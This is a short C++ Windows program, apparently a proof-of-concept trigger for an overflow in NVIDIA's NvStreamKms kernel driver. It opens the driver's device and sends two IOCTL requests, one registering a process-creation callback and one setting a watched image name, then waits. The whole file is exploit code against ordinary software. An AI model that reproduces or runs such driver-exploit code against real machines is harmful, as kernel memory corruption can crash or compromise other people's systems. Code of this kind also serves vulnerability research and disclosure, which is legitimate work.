// nvstreamkms_overflow.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"

#include <windows.h>

int main() {
  HANDLE device = CreateFileW(
    L"\\\\.\\NvStreamKms",
    GENERIC_READ | GENERIC_WRITE,
    FILE_SHARE_READ | FILE_SHARE_WRITE,
    nullptr,
    OPEN_EXISTING,
    FILE_ATTRIBUTE_NORMAL,
    nullptr);

  if (device == INVALID_HANDLE_VALUE) {
    fprintf(stderr, "Failed to open NvStreamKms\n");
    return 1;
  }

  struct Input {
    DWORD pid;
    DWORD arg;
  } input;

  input.pid = GetCurrentProcessId();
  input.arg = 1;

  // Make NvStreamKms call PsSetCreateProcessNotifyRoutine
  if (!DeviceIoControl(device, 0x220004, &input, 8, nullptr, 0, nullptr, nullptr)) {
    fprintf(stderr, "initial ioctl failed\n");
    return 1;
  }

  // Set an image name to watch for.
  wchar_t image_name[260] = L"blahblah";
  if (!DeviceIoControl(device, 0x22001c, image_name, 520, nullptr, 0, nullptr, nullptr)) {
    fprintf(stderr, "set image name ioctl failed\n");
    return 1;
  }
  
  Sleep(60000);
  return 0;
}
